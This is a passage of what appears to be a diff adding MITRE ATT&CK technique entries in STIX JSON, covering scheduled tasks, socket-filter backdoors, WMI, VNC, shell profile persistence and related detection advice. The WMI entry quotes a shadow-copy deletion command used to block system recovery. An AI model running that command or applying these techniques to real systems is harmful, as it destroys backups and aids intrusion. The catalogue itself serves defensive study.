current scheduled tasks. (Citation: TechNet Autoruns)\n\nRemote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. Tasks may also be created through Windows system management tools such as Windows Management Instrumentation and PowerShell, so additional logging may need to be configured to gather the appropriate data.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.5", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "Administrator" + ], + "x_mitre_remote_support": true, + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--005a06c6-14bf-4118-afa0-ebcd8aebb0c9", + "created": "2019-11-27T14:58:00.429Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1053/005", + "external_id": "T1053.005" + }, + { + "source_name": "ProofPoint Serpent", + "description": "Campbell, B. et al. (2022, March 21). Serpent, No Swiping! New Backdoor Targets French Entities with Unique Attack Chain. Retrieved April 11, 2022.", + "url": "https://www.proofpoint.com/us/blog/threat-insight/serpent-no-swiping-new-backdoor-targets-french-entities-unique-attack-chain" + }, + { + "source_name": "Defending Against Scheduled Task Attacks in Windows Environments", + "description": "Harshal Tupsamudre. (2022, June 20). Defending Against Scheduled Tasks. Retrieved July 5, 2022.", + "url": "https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments" + }, + { + "source_name": "Twitter Leoloobeek Scheduled Task", + "description": "Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved December 12, 2017.", + "url": "https://twitter.com/leoloobeek/status/939248813465853953" + }, + { + "source_name": "Tarrask scheduled task", + "description": "Microsoft Threat Intelligence Team & Detection and Response Team . (2022, April 12). Tarrask malware uses scheduled tasks for defense evasion. Retrieved June 1, 2022.", + "url": "https://www.microsoft.com/security/blog/2022/04/12/tarrask-malware-uses-scheduled-tasks-for-defense-evasion/" + }, + { + "source_name": "Microsoft Scheduled Task Events Win10", + "description": "Microsoft. (2017, May 28). Audit Other Object Access Events. Retrieved June 27, 2019.", + "url": "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-other-object-access-events" + }, + { + "source_name": "TechNet Scheduled Task Events", + "description": "Microsoft. (n.d.). General Task Registration. Retrieved December 12, 2017.", + "url": "https://technet.microsoft.com/library/dd315590.aspx" + }, + { + "source_name": "TechNet Autoruns", + "description": "Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. Retrieved June 6, 2016.", + "url": "https://technet.microsoft.com/en-us/sysinternals/bb963902" + }, + { + "source_name": "TechNet Forum Scheduled Task Operational Setting", + "description": "Satyajit321. (2015, November 3). Scheduled Tasks History Retention settings. Retrieved December 12, 2017.", + "url": "https://social.technet.microsoft.com/Forums/en-US/e5bca729-52e7-4fcb-ba12-3225c564674c/scheduled-tasks-history-retention-settings?forum=winserver8gen" + }, + { + "source_name": "SigmaHQ", + "description": "Sittikorn S. (2022, April 15). Removal Of SD Value to Hide Schedule Task - Registry. Retrieved June 1, 2022.", + "url": "https://github.com/SigmaHQ/sigma/blob/master/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal.yml" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-05-21T16:22:21.025Z", + "name": "Socket Filters", + "description": "Adversaries may attach filters to a network socket to monitor then activate backdoors used for persistence or command and control. With elevated permissions, adversaries can use features such as the `libpcap` library to open sockets and install filters to allow or disallow certain types of data to come through the socket. The filter may apply to all traffic passing through the specified network interface (or every interface if not specified). When the network interface receives a packet matching the filter criteria, additional actions can be triggered on the host, such as activation of a reverse shell.\n\nTo establish a connection, an adversary sends a crafted packet to the targeted host that matches the installed filter criteria.(Citation: haking9 libpcap network sniffing) Adversaries have used these socket filters to trigger the installation of implants, conduct ping backs, and to invoke command shells. Communication with these socket filters may also be used in conjunction with [Protocol Tunneling](https://attack.mitre.org/techniques/T1572).(Citation: exatrack bpf filters passive backdoors)(Citation: Leonardo Turla Penquin May 2020)\n\nFilters can be installed on any Unix-like platform with `libpcap` installed or on Windows hosts using `Winpcap`. Adversaries may use either `libpcap` with `pcap_setfilter` or the standard library function `setsockopt` with `SO_ATTACH_FILTER` options. Since the socket connection is not active until the packet is received, this behavior may be difficult to detect due to the lack of activity on a host, low CPU overhead, and limited visibility into raw socket usage.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "command-and-control" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Tim (Wadhwa-)Brown", + "CrowdStrike" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Identify running processes with raw sockets. Ensure processes listed have a need for an open raw socket and are in accordance with enterprise policy.(Citation: crowdstrike bpf socket filters)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [], + "x_mitre_system_requirements": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--005cc321-08ce-4d17-b1ea-cb5275926520", + "created": "2022-09-30T21:18:41.930Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1205/002", + "external_id": "T1205.002" + }, + { + "source_name": "exatrack bpf filters passive backdoors", + "description": "ExaTrack. (2022, May 11). Tricephalic Hellkeeper: a tale of a passive backdoor. Retrieved October 18, 2022.", + "url": "https://exatrack.com/public/Tricephalic_Hellkeeper.pdf" + }, + { + "source_name": "crowdstrike bpf socket filters", + "description": "Jamie Harries. (2022, May 25). Hunting a Global Telecommunications Threat: DecisiveArchitect and Its Custom Implant JustForFun. Retrieved October 18, 2022.", + "url": "https://www.crowdstrike.com/blog/how-to-hunt-for-decisivearchitect-and-justforfun-implant/" + }, + { + "source_name": "Leonardo Turla Penquin May 2020", + "description": "Leonardo. (2020, May 29). MALWARE TECHNICAL INSIGHT TURLA “Penquin_x64”. Retrieved March 11, 2021.", + "url": "https://www.leonardo.com/documents/20142/10868623/Malware+Technical+Insight+_Turla+%E2%80%9CPenquin_x64%E2%80%9D.pdf" + }, + { + "source_name": "haking9 libpcap network sniffing", + "description": "Luis Martin Garcia. (2008, February 1). Hakin9 Issue 2/2008 Vol 3 No.2 VoIP Abuse: Storming SIP Security. Retrieved October 18, 2022.", + "url": "http://recursos.aldabaknocking.com/libpcapHakin9LuisMartinGarcia.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-10-13T17:56:58.380Z", + "name": "Block Command Message", + "description": "Adversaries may block a command message from reaching its intended target to prevent command execution. In OT networks, command messages are sent to provide instructions to control system devices. A blocked command message can inhibit response functions from correcting a disruption or unsafe condition. (Citation: Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011) (Citation: Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems March 2016)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "inhibit-response-function" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Process: Process Termination", + "Operational Databases: Process History/Live Data", + "Application Log: Application Log Content", + "Network Traffic: Network Traffic Flow", + "Operational Databases: Process/Event Alarm" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--008b8f56-6107-48be-aa9f-746f927dbb61", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0803", + "external_id": "T0803" + }, + { + "source_name": "Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011", + "description": "Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011 A Taxonomy of Cyber Attacks on SCADA Systems Retrieved. 2018/01/12 ", + "url": "http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6142258" + }, + { + "source_name": "Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems March 2016", + "description": "Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems 2016, March 18 Analysis of the Cyber Attack on the Ukranian Power Grid: Defense Use Case Retrieved. 2018/03/27 ", + "url": "https://assets.contentstack.io/v3/assets/blt36c2e63521272fdc/blt6a77276749b76a40/607f235992f0063e5c070fff/E-ISAC_SANS_Ukraine_DUC_5%5b73%5d.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Indicator Removal from Tools", + "description": "If a malicious tool is detected and quarantined or otherwise curtailed, an adversary may be able to determine why the malicious tool was detected (the indicator), modify the tool by removing the indicator, and use the updated version that is no longer detected by the target's defensive systems or subsequent targets that may use similar systems.\n\nA good example of this is when malware is detected with a file signature and quarantined by anti-virus software. An adversary who can determine that the malware was quarantined because of its file signature may use [Software Packing](https://attack.mitre.org/techniques/T1045) or otherwise modify the file so it has a different signature, and then re-use the malware.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "The first detection of a malicious tool may trigger an anti-virus or other security tool alert. Similar events may also occur at the boundary through network IDS, email scanning appliance, etc. The initial detection should be treated as an indication of a potentially more invasive intrusion. The alerting system should be thoroughly investigated beyond that initial alert for activity that was not detected. Adversaries may continue with an operation, assuming that individual events like an anti-virus detect will not be investigated or that an analyst will not be able to conclusively link that event to other activity occurring on the network.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Log analysis", + "Host intrusion prevention systems", + "Anti-virus" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--00d0b012-8a03-410e-95de-5826bf542de6", + "created": "2017-05-31T21:30:54.176Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1066", + "external_id": "T1066" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-09-15T19:02:53.995Z", + "name": "Archive via Utility", + "description": "Adversaries may use utilities to compress and/or encrypt collected data prior to exfiltration. Many utilities include functionalities to compress, encrypt, or otherwise package data into a format that is easier/more secure to transport.\n\nAdversaries may abuse various utilities to compress or encrypt data before exfiltration. Some third party utilities may be preinstalled, such as tar on Linux and macOS or zip on Windows systems. \n\nOn Windows, diantz or makecab may be used to package collected files into a cabinet (.cab) file. diantz may also be used to download and compress files from remote locations (i.e. [Remote Data Staging](https://attack.mitre.org/techniques/T1074/002)).(Citation: diantz.exe_lolbas) xcopy on Windows can copy files and directories with a variety of options. Additionally, adversaries may use [certutil](https://attack.mitre.org/software/S0160) to Base64 encode collected data before exfiltration. \n\nAdversaries may use also third party utilities, such as 7-Zip, WinRAR, and WinZip, to perform similar activities.(Citation: 7zip Homepage)(Citation: WinRAR Homepage)(Citation: WinZip Homepage)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "collection" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [ + "Mayan Arora aka Mayan Mohan", + "Mark Wee" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Common utilities that may be present on the system or brought in by an adversary may be detectable through process monitoring and monitoring for command-line arguments for known archival utilities. This may yield a significant number of benign events, depending on how systems in the environment are typically used.\n\nConsider detecting writing of files with extensions and/or headers associated with compressed or encrypted file types. Detection efforts may focus on follow-on exfiltration activity, where compressed or encrypted files can be detected in transit with a network intrusion detection or data loss prevention system analyzing file headers.(Citation: Wikipedia File Header Signatures)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.3", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--00f90846-cbd1-4fc5-9233-df5c2bf2a662", + "created": "2020-02-20T21:01:25.428Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1560/001", + "external_id": "T1560.001" + }, + { + "source_name": "WinRAR Homepage", + "description": "A. Roshal. (2020). RARLAB. Retrieved February 20, 2020.", + "url": "https://www.rarlab.com/" + }, + { + "source_name": "WinZip Homepage", + "description": "Corel Corporation. (2020). WinZip. Retrieved February 20, 2020.", + "url": "https://www.winzip.com/win/en/" + }, + { + "source_name": "7zip Homepage", + "description": "I. Pavlov. (2019). 7-Zip. Retrieved February 20, 2020.", + "url": "https://www.7-zip.org/" + }, + { + "source_name": "diantz.exe_lolbas", + "description": "Living Off The Land Binaries, Scripts and Libraries (LOLBAS). (n.d.). Diantz.exe. Retrieved October 25, 2021.", + "url": "https://lolbas-project.github.io/lolbas/Binaries/Diantz/" + }, + { + "source_name": "Wikipedia File Header Signatures", + "description": "Wikipedia. (2016, March 31). List of file signatures. Retrieved April 22, 2016.", + "url": "https://en.wikipedia.org/wiki/List_of_file_signatures" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-05-09T14:00:00.188Z", + "name": "VNC", + "description": "Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely control machines using Virtual Network Computing (VNC). VNC is a platform-independent desktop sharing system that uses the RFB (“remote framebuffer”) protocol to enable users to remotely control another computer’s display by relaying the screen, mouse, and keyboard inputs over the network.(Citation: The Remote Framebuffer Protocol)\n\nVNC differs from [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) as VNC is screen-sharing software rather than resource-sharing software. By default, VNC uses the system's authentication, but it can be configured to use credentials specific to VNC.(Citation: MacOS VNC software for Remote Desktop)(Citation: VNC Authentication)\n\nAdversaries may abuse VNC to perform malicious actions as the logged-on user such as opening documents, downloading files, and running arbitrary commands. An adversary could use VNC to remotely control and monitor a system to collect data and information to pivot to other systems within the network. Specific VNC libraries/implementations have also been susceptible to brute force attacks and memory usage exploitation.(Citation: Hijacking VNC)(Citation: macOS root VNC login without authentication)(Citation: VNC Vulnerabilities)(Citation: Offensive Security VNC Authentication Check)(Citation: Attacking VNC Servers PentestLab)(Citation: Havana authentication bug)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "lateral-movement" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Use of VNC may be legitimate depending on the environment and how it’s used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior using VNC.\n\nOn macOS systems log show --predicate 'process = \"screensharingd\" and eventMessage contains \"Authentication:\"' can be used to review incoming VNC connection attempts for suspicious activity.(Citation: Apple Unified Log Analysis Remote Login and Screen Sharing)\n\nMonitor for use of built-in debugging environment variables (such as those containing credentials or other sensitive information) as well as test/default users on VNC servers, as these can leave openings for adversaries to abuse.(Citation: Gnome Remote Desktop grd-settings)(Citation: Gnome Remote Desktop gschema)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "x_mitre_system_requirements": [ + "VNC server installed and listening for connections." + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--01327cde-66c4-4123-bf34-5f258d59457b", + "created": "2020-02-11T18:28:44.950Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1021/005", + "external_id": "T1021.005" + }, + { + "source_name": "The Remote Framebuffer Protocol", + "description": "T. Richardson, J. Levine, RealVNC Ltd.. (2011, March). The Remote Framebuffer Protocol. Retrieved September 20, 2021.", + "url": "https://datatracker.ietf.org/doc/html/rfc6143#section-7.2.2" + }, + { + "source_name": "MacOS VNC software for Remote Desktop", + "description": "Apple Support. (n.d.). Set up a computer running VNC software for Remote Desktop. Retrieved August 18, 2021.", + "url": "https://support.apple.com/guide/remote-desktop/set-up-a-computer-running-vnc-software-apdbed09830/mac" + }, + { + "source_name": "VNC Authentication", + "description": "Tegan. (2019, August 15). Setting up System Authentication. Retrieved September 20, 2021.", + "url": "https://help.realvnc.com/hc/en-us/articles/360002250097-Setting-up-System-Authentication" + }, + { + "source_name": "Hijacking VNC", + "description": "Z3RO. (2019, March 10). Day 70: Hijacking VNC (Enum, Brute, Access and Crack). Retrieved September 20, 2021.", + "url": "https://int0x33.medium.com/day-70-hijacking-vnc-enum-brute-access-and-crack-d3d18a4601cc" + }, + { + "source_name": "macOS root VNC login without authentication", + "description": "Nick Miles. (2017, November 30). Detecting macOS High Sierra root account without authentication. Retrieved September 20, 2021.", + "url": "https://www.tenable.com/blog/detecting-macos-high-sierra-root-account-without-authentication" + }, + { + "source_name": "VNC Vulnerabilities", + "description": "Sergiu Gatlan. (2019, November 22). Dozens of VNC Vulnerabilities Found in Linux, Windows Solutions. Retrieved September 20, 2021.", + "url": "https://www.bleepingcomputer.com/news/security/dozens-of-vnc-vulnerabilities-found-in-linux-windows-solutions/" + }, + { + "source_name": "Offensive Security VNC Authentication Check", + "description": "Offensive Security. (n.d.). VNC Authentication. Retrieved October 6, 2021.", + "url": "https://www.offensive-security.com/metasploit-unleashed/vnc-authentication/" + }, + { + "source_name": "Attacking VNC Servers PentestLab", + "description": "Administrator, Penetration Testing Lab. (2012, October 30). Attacking VNC Servers. Retrieved October 6, 2021.", + "url": "https://pentestlab.blog/2012/10/30/attacking-vnc-servers/" + }, + { + "source_name": "Havana authentication bug", + "description": "Jay Pipes. (2013, December 23). Security Breach! Tenant A is seeing the VNC Consoles of Tenant B!. Retrieved October 6, 2021.", + "url": "http://lists.openstack.org/pipermail/openstack/2013-December/004138.html" + }, + { + "source_name": "Apple Unified Log Analysis Remote Login and Screen Sharing", + "description": "Sarah Edwards. (2020, April 30). Analysis of Apple Unified Logs: Quarantine Edition [Entry 6] – Working From Home? Remote Logins. Retrieved August 19, 2021.", + "url": "https://sarah-edwards-xzkc.squarespace.com/blog/2020/4/30/analysis-of-apple-unified-logs-quarantine-edition-entry-6-working-from-home-remote-logins" + }, + { + "source_name": "Gnome Remote Desktop grd-settings", + "description": "Pascal Nowack. (n.d.). Retrieved September 21, 2021.", + "url": "https://gitlab.gnome.org/GNOME/gnome-remote-desktop/-/blob/9aa9181e/src/grd-settings.c#L207" + }, + { + "source_name": "Gnome Remote Desktop gschema", + "description": "Pascal Nowack. (n.d.). Retrieved September 21, 2021.", + "url": "https://gitlab.gnome.org/GNOME/gnome-remote-desktop/-/blob/9aa9181e/src/org.gnome.desktop.remote-desktop.gschema.xml.in" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-04-11T18:13:25.130Z", + "name": "Windows Management Instrumentation", + "description": "Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is designed for programmers and is the infrastructure for management data and operations on Windows systems.(Citation: WMI 1-3) WMI is an administration feature that provides a uniform environment to access Windows system components.\n\nThe WMI service enables both local and remote access, though the latter is facilitated by [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) and [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006).(Citation: WMI 1-3) Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.(Citation: WMI 1-3) (Citation: Mandiant WMI)\n\nAn adversary can use WMI to interact with local and remote systems and use it as a means to execute various behaviors, such as gathering information for [Discovery](https://attack.mitre.org/tactics/TA0007) as well as [Execution](https://attack.mitre.org/tactics/TA0002) of commands and payloads.(Citation: Mandiant WMI) For example, `wmic.exe` can be abused by an adversary to delete shadow copies with the command `wmic.exe Shadowcopy Delete` (i.e., [Inhibit System Recovery](https://attack.mitre.org/techniques/T1490)).(Citation: WMI 6)\n\n**Note:** `wmic.exe` is deprecated as of January of 2024, with the WMIC feature being “disabled by default” on Windows 11+. WMIC will be removed from subsequent Windows releases and replaced by [PowerShell](https://attack.mitre.org/techniques/T1059/001) as the primary WMI interface.(Citation: WMI 7,8) In addition to PowerShell and tools like `wbemtool.exe`, COM APIs can also be used to programmatically interact with WMI via C++, .NET, VBScript, etc.(Citation: WMI 7,8)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "execution" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "@ionstorm", + "Olaf Hartong, Falcon Force", + "Tristan Madani" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor network traffic for WMI connections; the use of WMI in environments that do not typically use WMI may be suspect. Perform process monitoring to capture command-line arguments of \"wmic\" and detect commands that are used to perform remote behavior. (Citation: FireEye WMI 2015)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.5", + "x_mitre_data_sources": [], + "x_mitre_remote_support": true, + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--01a5a209-b94c-450b-b7f9-946497d91055", + "created": "2017-05-31T21:30:44.329Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1047", + "external_id": "T1047" + }, + { + "source_name": "FireEye WMI 2015", + "description": "Ballenthin, W., et al. (2015). Windows Management Instrumentation (WMI) Offense, Defense, and Forensics. Retrieved March 30, 2016.", + "url": "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf" + }, + { + "source_name": "Mandiant WMI", + "description": "Mandiant. (n.d.). Retrieved February 13, 2024.", + "url": "https://www.mandiant.com/resources/reports" + }, + { + "source_name": "WMI 6", + "description": "Microsoft. (2022, June 13). BlackCat. Retrieved February 13, 2024.", + "url": "https://www.microsoft.com/en-us/security/blog/2022/06/13/the-many-lives-of-blackcat-ransomware/" + }, + { + "source_name": "WMI 1-3", + "description": "Microsoft. (2023, March 7). Retrieved February 13, 2024.", + "url": "https://learn.microsoft.com/en-us/windows/win32/wmisdk/wmi-start-page?redirectedfrom=MSDN" + }, + { + "source_name": "WMI 7,8", + "description": "Microsoft. (2024, January 26). WMIC Deprecation. Retrieved February 13, 2024.", + "url": "https://techcommunity.microsoft.com/t5/windows-it-pro-blog/wmi-command-line-wmic-utility-deprecation-next-steps/ba-p/4039242" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-10-15T20:24:13.473Z", + "name": "Malicious Shell Modification", + "description": "Adversaries may establish persistence through executing malicious commands triggered by a user’s shell. User shells execute several configuration scripts at different points throughout the session based on events. For example, when a user opens a command line interface or remotely logs in (such as SSH) a login shell is initiated. The login shell executes scripts from the system (/etc) and the user’s home directory (~/) to configure the environment. All login shells on a system use /etc/profile when initiated. These configuration scripts run at the permission level of their directory and are often used to set environment variables, create aliases, and customize the user’s environment. When the shell exits or terminates, additional shell scripts are executed to ensure the shell exits appropriately. \n\nAdversaries may attempt to establish persistence by inserting commands into scripts automatically executed by shells. Using bash as an example, the default shell for most GNU/Linux systems, adversaries may add commands that launch malicious binaries into the /etc/profile and /etc/profile.d files (Citation: intezer-kaiji-malware). These files require root permissions and are executed each time any shell on a system launches. For user level permissions, adversaries can insert malicious commands into ~/.bash_profile, ~/.bash_login, or ~/.profile (Rocke) which are sourced when a user opens a command line interface or connects remotely. Adversaries often use ~/.bash_profile since the system only executes the first file that exists in the listed order. Adversaries have also leveraged the ~/.bashrc file (Tsunami, Rocke, Linux Rabbit, Magento) which is additionally executed if the connection is established remotely or an additional interactive shell is opened, such as a new tab in the command line interface. Some malware targets the termination of a program to trigger execution (Cannon), adversaries can use the ~/.bash_logout file to execute malicious commands at the end of a session(Pearl_shellbot). \n\nFor macOS, the functionality of this technique is similar but leverages zsh, the default shell for macOS 10.15+. When the Terminal.app is opened, the application launches a zsh login shell and a zsh interactive shell. The login shell configures the system environment using /etc/profile, /etc/zshenv, /etc/zprofile, and /etc/zlogin. The login shell then configures the user environment with ~/.zprofile and ~/.zlogin. The interactive shell uses the ~/.zshrc to configure the user environment. Upon exiting, /etc/zlogout and ~/.zlogout are executed. For legacy programs, macOS executes /etc/bashrc on startup.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Robert Wilson", + "Joe Gervais", + "Tony Lambert, Red Canary" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "While users may customize their shell profile files, there are only certain types of commands that typically appear in these files. Monitor for abnormal commands such as execution of unknown programs, opening network sockets, or reaching out across the network when user profiles are loaded during the login process.\n\nMonitor for changes to /ect/profile and /etc/profile.d, these files should only be modified by system administrators. MacOS users can leverage Apple’s Security Endpoint Framework using the ES_EVENT_TYPE_NOTIFY_WRITE function for monitoring these specific files. \n", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--01df3350-ce05-4bdf-bdf8-0a919a66d4a8", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1156", + "external_id": "T1156" + }, + { + "source_name": "intezer-kaiji-malware", + "description": "Paul Litvak. (2020, May 4). Kaiji: New Chinese Linux malware turning to Golang. Retrieved December 17, 2020.", + "url": "https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-30T21:01:39.967Z", + "name": "Screen Capture", + "description": "Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as CopyFromScreen, xwd, or screencapture.(Citation: CopyFromScreen .NET)(Citation: Antiquated Mac Malware)\n", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "collection" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Monitoring for screen capture behavior will depend on the method used to obtain data from the operating system and write output files. Detection methods could include collecting information from unusual processes using API calls used to obtain image data, and monitoring for image files written to disk. The sensor data may need to be correlated with other events to identify malicious activity, depending on the legitimacy of this behavior within a given network environment.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--0259baeb-9f63-4c69-bf10-eb038c390688", + "created": "2017-05-31T21:31:25.060Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": 